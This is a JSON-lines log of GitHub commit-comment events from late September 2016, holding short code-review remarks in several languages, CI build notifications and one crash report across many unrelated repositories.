{"id":"4634578866","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"gabrielhenz/crescer-2016-2"},"payload":{"comment":{"id":19217692,"position":4,"line":6,"path":"src/modulo-01-java-OO/modulo-01/Elfo.java","commit_id":"b53edf02c388b99e255888b46406477ac6cf8f73","created_at":"2016-09-29T01:56:39Z","updated_at":"2016-09-29T01:56:39Z","body":"👀 "}},"created_at":"2016-09-29T01:56:39Z"}
{"id":"4634580581","type":"CommitCommentEvent","actor":{"login":"gaborcsardi"},"repo":{"name":"MangoTheCat/shinytest"},"payload":{"comment":{"id":19217696,"position":14,"line":44,"path":"R/inject.R","commit_id":"f0e99ebb6c0c897281b74e123129b356e0070d87","created_at":"2016-09-29T01:57:10Z","updated_at":"2016-09-29T01:57:10Z","body":"This is really nitpicking, but with `options` I think it is in general good practice to use `on.exit`, in case an error happens. Or even `withr::with_options`, depending on `withr` is fine imo, it is tiny and R-only."}},"created_at":"2016-09-29T01:57:10Z"}
{"id":"4634582624","type":"CommitCommentEvent","actor":{"login":"gaborcsardi"},"repo":{"name":"MangoTheCat/shinytest"},"payload":{"comment":{"id":19217699,"position":14,"line":44,"path":"R/inject.R","commit_id":"f0e99ebb6c0c897281b74e123129b356e0070d87","created_at":"2016-09-29T01:57:51Z","updated_at":"2016-09-29T01:57:51Z","body":"Oops comment at wrong place.... will move to the PR."}},"created_at":"2016-09-29T01:57:51Z"}
{"id":"4634585614","type":"CommitCommentEvent","actor":{"login":"meee1"},"repo":{"name":"ArduPilot/MissionPlanner"},"payload":{"comment":{"id":19217706,"position":null,"line":null,"path":null,"commit_id":"33561fbbbec7b0b55dc7d5dca0a15a2d38a8d4c1","created_at":"2016-09-29T01:58:52Z","updated_at":"2016-09-29T01:58:52Z","body":"you can think @nicksargeant for passing this one on."}},"created_at":"2016-09-29T01:58:52Z"}
{"id":"4634587376","type":"CommitCommentEvent","actor":{"login":"SeanSeanYin"},"repo":{"name":"SeanSeanYin/TWD97toLongitudeLatitude-Swift"},"payload":{"comment":{"id":19217712,"position":null,"line":null,"path":null,"commit_id":"26b4efe87338c95b6eb8ae35d647e60112250a7e","created_at":"2016-09-29T01:59:24Z","updated_at":"2016-09-29T01:59:24Z","body":"First version"}},"created_at":"2016-09-29T01:59:24Z"}
{"id":"4634587630","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"dcfigueiredo/crescer-2016-2"},"payload":{"comment":{"id":19217713,"position":14,"line":14,"path":"src/modulo-01-java-OO/modulo-01/Elfo.java","commit_id":"408cd00b94d7ed1b156688728ef465cd5c851849","created_at":"2016-09-29T01:59:30Z","updated_at":"2016-09-29T01:59:30Z","body":"cuidado.. `q` não é um bom nome de variável."}},"created_at":"2016-09-29T01:59:30Z"}
{"id":"4636231688","type":"CommitCommentEvent","actor":{"login":"thenightex"},"repo":{"name":"TheSharks/WildBeast"},"payload":{"comment":{"id":19221429,"position":null,"line":null,"path":null,"commit_id":"264f42a75b2a6cd10fea510a609d19431a37dfaf","created_at":"2016-09-29T10:00:14Z","updated_at":"2016-09-29T10:00:14Z","body":"fite me \r\nI didn't @LWTechGaming"}},"created_at":"2016-09-29T10:00:14Z"}
{"id":"4636234488","type":"CommitCommentEvent","actor":{"login":"benaskins"},"repo":{"name":"micapam/policy-calculations-test"},"payload":{"comment":{"id":19221444,"position":15,"line":15,"path":"features/calculate_price.feature","commit_id":"0ffa3e1bd37eb4bec00199cff6e708a9d808906f","created_at":"2016-09-29T10:00:46Z","updated_at":"2016-09-29T10:00:46Z","body":"Hey Josh, I'm looking over your code this evening and will be leaving some comments. My first questions... is this spinach?"}},"created_at":"2016-09-29T10:00:46Z"}
{"id":"4636234775","type":"CommitCommentEvent","actor":{"login":"ledvinap"},"repo":{"name":"cleanflight/cleanflight"},"payload":{"comment":{"id":19221445,"position":33,"line":106,"path":"src/main/drivers/accgyro_mpu6500.c","commit_id":"61e5fbd40386abc02b63b17fe1c33b748e838ca7","created_at":"2016-09-29T10:00:49Z","updated_at":"2016-09-29T10:00:49Z","body":"quite a lot of delays ... "}},"created_at":"2016-09-29T10:00:49Z"}
{"id":"4636234947","type":"CommitCommentEvent","actor":{"login":"joaotavora"},"repo":{"name":"PuercoPop/sly"},"payload":{"comment":{"id":19221446,"position":null,"line":null,"path":null,"commit_id":"fe101c7a6bf1e720f9688ce5d7615e616e1d2007","created_at":"2016-09-29T10:00:51Z","updated_at":"2016-09-29T10:00:51Z","body":"Unfortunately, this won't react to changes when an mrepl is already running. Not sure if that is a bad thing, but I prefer to let bind it around the places I know it's used."}},"created_at":"2016-09-29T10:00:51Z"}
{"id":"4636236597","type":"CommitCommentEvent","actor":{"login":"benaskins"},"repo":{"name":"micapam/policy-calculations-test"},"payload":{"comment":{"id":19221449,"position":15,"line":15,"path":"features/calculate_price.feature","commit_id":"0ffa3e1bd37eb4bec00199cff6e708a9d808906f","created_at":"2016-09-29T10:01:10Z","updated_at":"2016-09-29T10:01:10Z","body":"It looks quite cucumbery."}},"created_at":"2016-09-29T10:01:10Z"}
{"id":"4636245013","type":"CommitCommentEvent","actor":{"login":"bigomega"},"repo":{"name":"JedWatson/react-select"},"payload":{"comment":{"id":19221456,"position":65,"line":87,"path":"src/Async.js","commit_id":"b319024b20745e2cf788e7d08978376b493a08ac","created_at":"2016-09-29T10:02:46Z","updated_at":"2016-09-29T10:02:46Z","body":"I ended up passing `cache={{}}`, but now that you mention it, yes, omitting the property seems to work."}},"created_at":"2016-09-29T10:02:46Z"}
{"id":"4636247071","type":"CommitCommentEvent","actor":{"login":"LukasReschke"},"repo":{"name":"nextcloud/github_helper"},"payload":{"comment":{"id":19221458,"position":null,"line":null,"path":null,"commit_id":"d0f8fb6194566242a7563a90a93f5fe54b6ae195","created_at":"2016-09-29T10:03:11Z","updated_at":"2016-09-29T10:03:11Z","body":"The \"ping morris and let him do it\" way? 💃"}},"created_at":"2016-09-29T10:03:11Z"}
{"id":"4636250938","type":"CommitCommentEvent","actor":{"login":"jbandura"},"repo":{"name":"honeypotio/blog-honeypot-io"},"payload":{"comment":{"id":19221462,"position":null,"line":null,"path":null,"commit_id":"618b4390fcdfd095e9596abf5897c0d1c2ead0ac","created_at":"2016-09-29T10:03:58Z","updated_at":"2016-09-29T10:03:58Z","body":"reverted because pushing to production without testing is probably a bad idea ... sorry for that"}},"created_at":"2016-09-29T10:03:58Z"}
{"id":"4636252695","type":"CommitCommentEvent","actor":{"login":"ITBlackwood"},"repo":{"name":"Signmark/ATMTA-Station"},"payload":{"comment":{"id":19221465,"position":34,"line":34,"path":"hyntatmta/code/game/machinery/kitchen/glass_recycler.dm","commit_id":"2f830afe960aac452e482a3eb4c26a4c084a609c","created_at":"2016-09-29T10:04:18Z","updated_at":"2016-09-29T10:04:18Z","body":"А зачем? Итак неплохо."}},"created_at":"2016-09-29T10:04:18Z"}
{"id":"4636254719","type":"CommitCommentEvent","actor":{"login":"barmidrol"},"repo":{"name":"R1cro/SocialNetwork"},"payload":{"comment":{"id":19221470,"position":6,"line":6,"path":"app/views/users/_user_follow_form.html.erb","commit_id":"7312501c16eb8c52edce4635d6497f169fcd58b5","created_at":"2016-09-29T10:04:43Z","updated_at":"2016-09-29T10:04:43Z","body":"тут идентация 4 пробела"}},"created_at":"2016-09-29T10:04:43Z"}
{"id":"4636254857","type":"CommitCommentEvent","actor":{"login":"testcc1"},"repo":{"name":"testcc1/Github_repo"},"payload":{"comment":{"id":19221471,"position":null,"line":null,"path":null,"commit_id":"033e39727f5bfffbe83e97ccfa2d69d4f4bc6b02","created_at":"2016-09-29T10:04:45Z","updated_at":"2016-09-29T10:04:45Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://127.0.0.1:8080/ui#review:id=56)"}},"created_at":"2016-09-29T10:04:45Z"}
{"id":"4636255268","type":"CommitCommentEvent","actor":{"login":"barmidrol"},"repo":{"name":"R1cro/SocialNetwork"},"payload":{"comment":{"id":19221472,"position":20,"line":12,"path":"app/views/users/show.html.erb","commit_id":"7312501c16eb8c52edce4635d6497f169fcd58b5","created_at":"2016-09-29T10:04:50Z","updated_at":"2016-09-29T10:04:50Z","body":"а тут 2 :("}},"created_at":"2016-09-29T10:04:50Z"}
{"id":"4636256196","type":"CommitCommentEvent","actor":{"login":"benaskins"},"repo":{"name":"micapam/policy-calculations-test"},"payload":{"comment":{"id":19221475,"position":12,"line":12,"path":"app/models/concerns/range_bracket.rb","commit_id":"a3ea4e5527582065397072588cfd078fd49d3de8","created_at":"2016-09-29T10:05:02Z","updated_at":"2016-09-29T10:05:02Z","body":"Looks good. I wasn't aware of the overlap validator. Nice use of `with_model` in the spec too to test the concern."}},"created_at":"2016-09-29T10:05:02Z"}
{"id":"4636256281","type":"CommitCommentEvent","actor":{"login":"barmidrol"},"repo":{"name":"R1cro/SocialNetwork"},"payload":{"comment":{"id":19221476,"position":12,"line":12,"path":"app/views/users/show_follow.html.erb","commit_id":"7312501c16eb8c52edce4635d6497f169fcd58b5","created_at":"2016-09-29T10:05:03Z","updated_at":"2016-09-29T10:05:03Z","body":"а тут снова 4"}},"created_at":"2016-09-29T10:05:03Z"}
{"id":"4636256404","type":"CommitCommentEvent","actor":{"login":"ITBlackwood"},"repo":{"name":"Signmark/ATMTA-Station"},"payload":{"comment":{"id":19221477,"position":2,"line":2,"path":"hyntatmta/code/game/machinery/procs.dm","commit_id":"2f830afe960aac452e482a3eb4c26a4c084a609c","created_at":"2016-09-29T10:05:05Z","updated_at":"2016-09-29T10:05:05Z","body":"Понятия не имею. Гуновские процессы"}},"created_at":"2016-09-29T10:05:05Z"}
{"id":"4636268549","type":"CommitCommentEvent","actor":{"login":"claziss"},"repo":{"name":"dr-hannibal/libffi"},"payload":{"comment":{"id":19221495,"position":21,"line":55,"path":"src/arc/arcompact.S","commit_id":"4b45c8a352cc8c0432776e4e591560710bacd773","created_at":"2016-09-29T10:07:30Z","updated_at":"2016-09-29T10:07:30Z","body":"It depends what you want to have when disassembling. Minimal info are as you indicated. "}},"created_at":"2016-09-29T10:07:30Z"}
{"id":"4636270582","type":"CommitCommentEvent","actor":{"login":"alkozko"},"repo":{"name":"Diman3589/triangle"},"payload":{"comment":{"id":19221499,"position":127,"line":126,"path":"Triangle/Triangle/Program.cs","commit_id":"9e895924f4471112a5c477f06084f3c22f2a6a83","created_at":"2016-09-29T10:07:55Z","updated_at":"2016-09-29T10:07:55Z","body":"вообще ref не для экономии памяти придумали"}},"created_at":"2016-09-29T10:07:55Z"}
{"id":"4636271677","type":"CommitCommentEvent","actor":{"login":"benaskins"},"repo":{"name":"micapam/policy-calculations-test"},"payload":{"comment":{"id":19221503,"position":3,"line":3,"path":"app/models/application_record.rb","commit_id":"e4f4f6bd95976881e4b5e2415687d77c0cd35a1a","created_at":"2016-09-29T10:08:09Z","updated_at":"2016-09-29T10:08:09Z","body":"Note for other IBU developers looking at this: http://blog.bigbinary.com/2015/12/28/application-record-in-rails-5.html"}},"created_at":"2016-09-29T10:08:09Z"}
{"id":"4636277422","type":"CommitCommentEvent","actor":{"login":"gpsloco"},"repo":{"name":"manlycode/GMailinator"},"payload":{"comment":{"id":19221511,"position":null,"line":null,"path":null,"commit_id":"0f3592a31e05526106d180bffc798710863ab93b","created_at":"2016-09-29T10:09:18Z","updated_at":"2016-09-29T10:09:18Z","body":"Does this work for anybody? The 10.12 Fix adds the Supported OS UUID Array beautyfully, but after this, mail.app still crashes/throws errors on usage. Error Is:\r\n\r\n`Ausnahmename: NSInvalidArgumentException\r\nBeschreibung: -[MessageListViewController archiveMessages:]: unrecognized selector sent to instance 0x60000019f960\r\nBenutzerinformationen: (null)\r\n\r\n0   CoreFoundation                      0x00007fffc1bdf52b __exceptionPreprocess + 171\r\n1   libobjc.A.dylib                     0x00007fffd62b7cad objc_exception_throw + 48\r\n2   CoreFoundation                      0x00007fffc1c60d34 -[NSObject(NSObject) doesNotRecognizeSelector:] + 132\r\n3   CoreFoundation                      0x00007fffc1b51bf5 ___forwarding___ + 1061\r\n4   CoreFoundation                      0x00007fffc1b51748 _CF_forwarding_prep_0 + 120\r\n5   GMailinator                         0x000000010c7d30cd -[GMailinator overrideMailKeyDown:] + 493\r\n6   AppKit                              0x00007fffc005c7ec -[NSWindow(NSEventRouting) _reallySendEvent:isDelayedEvent:] + 4086\r\n7   AppKit                              0x00007fffc005b42a -[NSWindow(NSEventRouting) sendEvent:] + 541\r\n8   AppKit                              0x00007fffbfefca1c -[NSApplication(NSEvent) sendEvent:] + 4768\r\n9   Mail                                0x00000001074fd4c9 Mail + 234697\r\n10  AppKit                              0x00007fffbf7e2009 -[NSApplication run] + 1002\r\n11  AppKit                              0x00007fffbf7aca8a NSApplicationMain + 1237\r\n12  libdyld.dylib                       0x00007fffd6b95255 start + 1\r\n13  ???                                 0x0000000000000001 0x0 + 1`"}},"created_at":"2016-09-29T10:09:18Z"}
{"id":"4636278682","type":"CommitCommentEvent","actor":{"login":"krakjoe"},"repo":{"name":"krakjoe/apcu"},"payload":{"comment":{"id":19221513,"position":null,"line":null,"path":null,"commit_id":"3c48da9de938cee96c5db15fd65e64010a587dfa","created_at":"2016-09-29T10:09:34Z","updated_at":"2016-09-29T10:09:34Z","body":"Thanks @remicollet "}},"created_at":"2016-09-29T10:09:34Z"}
{"id":"4636279560","type":"CommitCommentEvent","actor":{"login":"mtanda"},"repo":{"name":"grafana/grafana"},"payload":{"comment":{"id":19221515,"position":33,"line":73,"path":"public/app/plugins/datasource/prometheus/datasource.ts","commit_id":"add9e7e3a03ad519156758a8e63944db0516586d","created_at":"2016-09-29T10:09:44Z","updated_at":"2016-09-29T10:09:44Z","body":"The query parser can't detect where the Grafana should insert filter part.\r\n\r\nPlease see this query.\r\nIt is normal case, all metrics in query doesn't have some of labels.\r\nThe `method_code:http_errors:rate5m` has `code` labels, but `method:http_requests:rate5m` is not.\r\n\r\nhttps://prometheus.io/docs/querying/operators/\r\n```\r\nmethod_code:http_errors:rate5m{code=\"500\"} / ignoring(code) method:http_requests:rate5m\r\n```"}},"created_at":"2016-09-29T10:09:44Z"}
{"id":"4636287076","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19221525,"position":19,"line":576,"path":"src/utils/polygonUtils.cpp","commit_id":"f4461ca41aab8cc5b7b3c7b1ed06edacb5f97ccc","created_at":"2016-09-29T10:11:21Z","updated_at":"2016-09-29T10:11:21Z","body":"But then we would have to compute `dist2` again or we have to return it as well.\r\nBoth ain't really pretty."}},"created_at":"2016-09-29T10:11:21Z"}
{"id":"4636290822","type":"CommitCommentEvent","actor":{"login":"marhyorh"},"repo":{"name":"marhyorh/FetchGifs"},"payload":{"comment":{"id":19221530,"position":null,"line":null,"path":null,"commit_id":"cc7c652e58be3139bf2dd0bb09758f0977f8bfdc","created_at":"2016-09-29T10:12:08Z","updated_at":"2016-09-29T10:12:08Z","body":"@andela-joyebanji "}},"created_at":"2016-09-29T10:12:08Z"}
{"id":"4636291607","type":"CommitCommentEvent","actor":{"login":"srirambv"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19221532,"position":null,"line":null,"path":null,"commit_id":"588706d5443d303a8eee4ef3bafe86915b62d57e","created_at":"2016-09-29T10:12:17Z","updated_at":"2016-09-29T10:12:17Z","body":"++ works as expected"}},"created_at":"2016-09-29T10:12:17Z"}
{"id":"4636296890","type":"CommitCommentEvent","actor":{"login":"benaskins"},"repo":{"name":"micapam/policy-calculations-test"},"payload":{"comment":{"id":19221542,"position":11,"line":11,"path":"app/models/quote.rb","commit_id":"3d1546abf69acbf1a04511cc07b4c2dab4bc6c37","created_at":"2016-09-29T10:13:22Z","updated_at":"2016-09-29T10:13:22Z","body":"This is looking good. You might like to consider persisting the price on the quote in the case that the rating matrix changes after the initial quote is generated."}},"created_at":"2016-09-29T10:13:22Z"}
{"id":"4636298936","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19221547,"position":30,"line":38,"path":"src/utils/polygonUtils.cpp","commit_id":"263bb3099b4302bc96ee40619e9f3b002af702ea","created_at":"2016-09-29T10:13:47Z","updated_at":"2016-09-29T10:13:47Z","body":"fixed"}},"created_at":"2016-09-29T10:13:47Z"}
{"id":"4636303443","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19221557,"position":75,"line":77,"path":"src/utils/polygonUtils.cpp","commit_id":"263bb3099b4302bc96ee40619e9f3b002af702ea","created_at":"2016-09-29T10:14:44Z","updated_at":"2016-09-29T10:14:44Z","body":"No, the update is done before the condition.\r\nI think the comment should be enough to inform the reader about that."}},"created_at":"2016-09-29T10:14:44Z"}
{"id":"4636307784","type":"CommitCommentEvent","actor":{"login":"marhyorh"},"repo":{"name":"marhyorh/FetchGifs"},"payload":{"comment":{"id":19221565,"position":5,"line":4,"path":"src/index.js","commit_id":"6e6942ce20a598a4d30e8bfa4c3db50c39a7b921","created_at":"2016-09-29T10:15:37Z","updated_at":"2016-09-29T10:15:37Z","body":"@andela-joyebanji I'm lazy, so i did this :yum: "}},"created_at":"2016-09-29T10:15:37Z"}
{"id":"4636307971","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19221566,"position":51,"line":126,"path":"src/PrimeTower.cpp","commit_id":"afd91bfd2e790c74e90f584eb9c10ae064b94ab9","created_at":"2016-09-29T10:15:40Z","updated_at":"2016-09-29T10:15:40Z","body":"Haha, no he was fired for standing around all day saying he didn't know what to do."}},"created_at":"2016-09-29T10:15:40Z"}
{"id":"4636309030","type":"CommitCommentEvent","actor":{"login":"testcc1"},"repo":{"name":"testcc1/GitHub_NewRepo"},"payload":{"comment":{"id":19221569,"position":null,"line":null,"path":null,"commit_id":"2b77cea0027c7d15ed864c7ce4e1e47e7222562f","created_at":"2016-09-29T10:15:53Z","updated_at":"2016-09-29T10:15:53Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://127.0.0.1:8080/ui#review:id=1)"}},"created_at":"2016-09-29T10:15:53Z"}
{"id":"4636309671","type":"CommitCommentEvent","actor":{"login":"alkozko"},"repo":{"name":"Diman3589/triangle"},"payload":{"comment":{"id":19221570,"position":25,"line":24,"path":"Triangle/Triangle/Program.cs","commit_id":"9e895924f4471112a5c477f06084f3c22f2a6a83","created_at":"2016-09-29T10:16:02Z","updated_at":"2016-09-29T10:16:02Z","body":"А сколько потребуется усилий для внесения изменений в подобный код?"}},"created_at":"2016-09-29T10:16:02Z"}
{"id":"4636309955","type":"CommitCommentEvent","actor":{"login":"jamesbascle"},"repo":{"name":"Jagged/OneOf"},"payload":{"comment":{"id":19221571,"position":null,"line":null,"path":null,"commit_id":"b5c4981bdd732dd7bfe336a25f1b0db0688f4795","created_at":"2016-09-29T10:16:06Z","updated_at":"2016-09-29T10:16:06Z","body":"Indefinitely prefer else as well.  I think the feel is good. Definitely a\nbit simpler and maybe more efficient than what I cooked up.\n\nOn Sep 29, 2016 5:24 AM, \"Will Mooar\" <notifications@github.com> wrote:\n\n> I'm thinking of renaming Otherwise to something else, there's just\n> something about the name that just doesn't feel like it fits with C#,\n> normally default or else is what we expect to see. Otherwise would\n> probably fit better with VB, this ain't VerBose!\n>\n> Something like this perhaps?\n>\n> - xx.Match(x).Match(y).Default(z)\n> - xx.Match(x).Match(y).OrThrow(..)\n>\n> - xx.Switch(x).Switch(y).Default(z)\n> - xx.Switch(x).Switch(y).OrThrow(..)\n>\n> Hmm, I may have committed a change for this by the time you read this!\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Jagged/OneOf/commit/b5c4981bdd732dd7bfe336a25f1b0db0688f4795#commitcomment-19221053>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AD_ohZvutv1NVsa72pjYWFz7Vr1uaxVZks5qu4PmgaJpZM4KIntt>\n> .\n>\n"}},"created_at":"2016-09-29T10:16:06Z"}
{"id":"4636310816","type":"CommitCommentEvent","actor":{"login":"ohsOllila"},"repo":{"name":"NMRLipids/NmrLipidsCholXray"},"payload":{"comment":{"id":19221573,"position":null,"line":null,"path":null,"commit_id":"12a2cbc8ab0a1a5bf7fdc8309018af14cb80b414","created_at":"2016-09-29T10:16:17Z","updated_at":"2016-09-29T10:16:17Z","body":"What does \"sim1\" and \"sim2\" in the end of these files mean?\r\n\r\nDATA/charmm36/chol0_openMM/OrderParamSN1_sim1.dat\r\nDATA/charmm36/chol0_openMM/OrderParamSN1_sim2.dat\r\nDATA/charmm36/chol0_openMM/OrderParamSN2_sim1.dat\r\nDATA/charmm36/chol0_openMM/OrderParamSN2_sim2.dat "}},"created_at":"2016-09-29T10:16:17Z"}
{"id":"4636311387","type":"CommitCommentEvent","actor":{"login":"magdalena19"},"repo":{"name":"magdalena19/lberg-map"},"payload":{"comment":{"id":19221575,"position":41,"line":9,"path":"app/views/places/index.html.haml","commit_id":"b2e3400f85c2597c81db99039e9e133b8f0c86e7","created_at":"2016-09-29T10:16:25Z","updated_at":"2016-09-29T10:16:25Z","body":"ich denke, um es stringent zu halten sollten wir immer die HAML-Kurzvarianten nutzen, wenn möglich, oder? Das wäre hier:\r\n` %table#places.display.compact{cellspacing: '0', width: '100%'}`\r\n"}},"created_at":"2016-09-29T10:16:25Z"}
{"id":"4636313222","type":"CommitCommentEvent","actor":{"login":"Kauko"},"repo":{"name":"finnishtransportagency/harja"},"payload":{"comment":{"id":19221580,"position":null,"line":null,"path":null,"commit_id":"c557fd5f2ed37908988be25161c47ce44cba16b2","created_at":"2016-09-29T10:16:49Z","updated_at":"2016-09-29T10:16:49Z","body":"Mihin tämä tyhjä tila tulee? Paneelista poistettiin tarkoituksella turhaa ilmaa."}},"created_at":"2016-09-29T10:16:49Z"}
{"id":"4636316351","type":"CommitCommentEvent","actor":{"login":"magdalena19"},"repo":{"name":"magdalena19/lberg-map"},"payload":{"comment":{"id":19221585,"position":1,"line":1,"path":"app/assets/stylesheets/data_table.css.scss","commit_id":"b2e3400f85c2597c81db99039e9e133b8f0c86e7","created_at":"2016-09-29T10:17:29Z","updated_at":"2016-09-29T10:17:29Z","body":"diese File ist nicht selbstgeschrieben, oder? Dann gehört das unter vendor/assets"}},"created_at":"2016-09-29T10:17:29Z"}
{"id":"4636322894","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimExchange"},"payload":{"comment":{"id":19221591,"position":null,"line":null,"path":null,"commit_id":"5ea9a5b14f762d178d68a67dea7228b360ff30d2","created_at":"2016-09-29T10:18:49Z","updated_at":"2016-09-29T10:18:49Z","body":"TeamCity Xbim :: Xbim Exchange :: XbimExchange [Build 188](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1263&buildTypeId=Xbim_XbimExchange_XbimExchange) is now running\n"}},"created_at":"2016-09-29T10:18:49Z"}
{"id":"4636327077","type":"CommitCommentEvent","actor":{"login":"testcc1"},"repo":{"name":"testcc1/GitHub_NewRepo"},"payload":{"comment":{"id":19221596,"position":null,"line":null,"path":null,"commit_id":"dfdda484751642d9f41e8d544e8b25b62afb5041","created_at":"2016-09-29T10:19:41Z","updated_at":"2016-09-29T10:19:41Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://127.0.0.1:8080/ui#review:id=2)"}},"created_at":"2016-09-29T10:19:41Z"}
{"id":"4636327256","type":"CommitCommentEvent","actor":{"login":"staabm"},"repo":{"name":"yakamara/yconverter"},"payload":{"comment":{"id":19221597,"position":13,"line":13,"path":"lib/Adminer.php","commit_id":"dd728dd002119e4e0fb7147deccd6a428027c010","created_at":"2016-09-29T10:19:44Z","updated_at":"2016-09-29T10:19:44Z","body":"gehört diese klasse hier rein?"}},"created_at":"2016-09-29T10:19:44Z"}
{"id":"4636327488","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimExchange"},"payload":{"comment":{"id":19221598,"position":null,"line":null,"path":null,"commit_id":"5ea9a5b14f762d178d68a67dea7228b360ff30d2","created_at":"2016-09-29T10:19:47Z","updated_at":"2016-09-29T10:19:47Z","body":"TeamCity Xbim :: Xbim Exchange :: XbimExchange [Build 188](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1263&buildTypeId=Xbim_XbimExchange_XbimExchange) outcome was **FAILURE**\nSummary: Compilation error: Xbim.COBie\\Xbim.COBie.csproj; compilation error: Xbim.COBieLite\\Xbim.COBieLite.csproj (new); compilation error: Xbim.COBieLiteUK\\Xbim.COBieLiteUK.csproj Build time: 00:00:58"}},"created_at":"2016-09-29T10:19:47Z"}
{"id":"4636329567","type":"CommitCommentEvent","actor":{"login":"fancyecommerce"},"repo":{"name":"fancyecommerce/yii2_fecshop"},"payload":{"comment":{"id":19221600,"position":1,"line":1,"path":"app/appfront/modules/Customer/block/account/Index.php","commit_id":"ffa7fedbc716a65685a26e308eb9d5756e906ce0","created_at":"2016-09-29T10:20:14Z","updated_at":"2016-09-29T10:20:14Z","body":"账号中心block部分"}},"created_at":"2016-09-29T10:20:14Z"}
{"id":"4636330552","type":"CommitCommentEvent","actor":{"login":"fancyecommerce"},"repo":{"name":"fancyecommerce/yii2_fecshop"},"payload":{"comment":{"id":19221603,"position":1,"line":1,"path":"app/appfront/modules/Customer/block/account/Index.php","commit_id":"ffa7fedbc716a65685a26e308eb9d5756e906ce0","created_at":"2016-09-29T10:20:25Z","updated_at":"2016-09-29T10:20:25Z","body":"oooo"}},"created_at":"2016-09-29T10:20:25Z"}
{"id":"4636336849","type":"CommitCommentEvent","actor":{"login":"testcc1"},"repo":{"name":"testcc1/Github_repo"},"payload":{"comment":{"id":19221615,"position":null,"line":null,"path":null,"commit_id":"d2e5354e76fda66e1ba09b27d07e6f6b648ab26c","created_at":"2016-09-29T10:21:43Z","updated_at":"2016-09-29T10:21:43Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://127.0.0.1:8080/ui#review:id=57)"}},"created_at":"2016-09-29T10:21:43Z"}
{"id":"4636337531","type":"CommitCommentEvent","actor":{"login":"susuxianxian"},"repo":{"name":"susuxianxian/Atlas"},"payload":{"comment":{"id":19221617,"position":null,"line":null,"path":null,"commit_id":"128f24a5e5161a9abc598ad8e48cd616b23c939f","created_at":"2016-09-29T10:21:52Z","updated_at":"2016-09-29T10:21:52Z","body":"gwhqjgj"}},"created_at":"2016-09-29T10:21:52Z"}
{"id":"4636338091","type":"CommitCommentEvent","actor":{"login":"testcc1"},"repo":{"name":"testcc1/GitHub_NewRepo"},"payload":{"comment":{"id":19221619,"position":null,"line":null,"path":null,"commit_id":"d3af311517ff0936c30964701cf7b2ac31225abc","created_at":"2016-09-29T10:21:59Z","updated_at":"2016-09-29T10:21:59Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://127.0.0.1:8080/ui#review:id=23)"}},"created_at":"2016-09-29T10:21:59Z"}
{"id":"4636338656","type":"CommitCommentEvent","actor":{"login":"sponte"},"repo":{"name":"eu-evops/selenium-pom"},"payload":{"comment":{"id":19221621,"position":null,"line":null,"path":null,"commit_id":"61d08b3bf11882ac466902439542e2101f7ccbac","created_at":"2016-09-29T10:22:06Z","updated_at":"2016-09-29T10:22:06Z","body":"TeamCity Selenium POM :: CI [Build 81](https://teamcity.sponte.uk/viewLog.html?buildId=1140&buildTypeId=SeleniumPom_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 52 Build time: 00:04:27"}},"created_at":"2016-09-29T10:22:06Z"}
{"id":"4636339620","type":"CommitCommentEvent","actor":{"login":"susuxianxian"},"repo":{"name":"susuxianxian/Atlas"},"payload":{"comment":{"id":19221625,"position":null,"line":null,"path":null,"commit_id":"128f24a5e5161a9abc598ad8e48cd616b23c939f","created_at":"2016-09-29T10:22:18Z","updated_at":"2016-09-29T10:22:18Z","body":"what"}},"created_at":"2016-09-29T10:22:18Z"}
{"id":"4636339664","type":"CommitCommentEvent","actor":{"login":"sponte"},"repo":{"name":"eu-evops/selenium-pom"},"payload":{"comment":{"id":19221626,"position":null,"line":null,"path":null,"commit_id":"c207c44c257ab56c24e1cbac4f1d90020d8d2a5b","created_at":"2016-09-29T10:22:19Z","updated_at":"2016-09-29T10:22:19Z","body":"TeamCity Selenium POM :: CI [Build 82](https://teamcity.sponte.uk/viewLog.html?buildId=1141&buildTypeId=SeleniumPom_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 52 Build time: 00:04:19"}},"created_at":"2016-09-29T10:22:19Z"}
{"id":"4636341632","type":"CommitCommentEvent","actor":{"login":"mister-roboto"},"repo":{"name":"plone/plone.server"},"payload":{"comment":{"id":19221629,"position":null,"line":null,"path":null,"commit_id":"46148177af170396d3fc3fe9fd50fbbb5b7c98eb","created_at":"2016-09-29T10:22:43Z","updated_at":"2016-09-29T10:22:43Z","body":"Ramon Navarro Bosch your emails are not known to GithHb and thus it is impossible to know if you have signed the Plone Contributor Agreement, which is required to merge this pull request.\n\nLearn about the Plone Contributor Agreement: http://docs.plone.org/develop/coredev/docs/contributors_agreement_explained.html How to add more emails to your GitHub account: https://help.github.com/articles/adding-an-email-address-to-your-github-account/ "}},"created_at":"2016-09-29T10:22:43Z"}
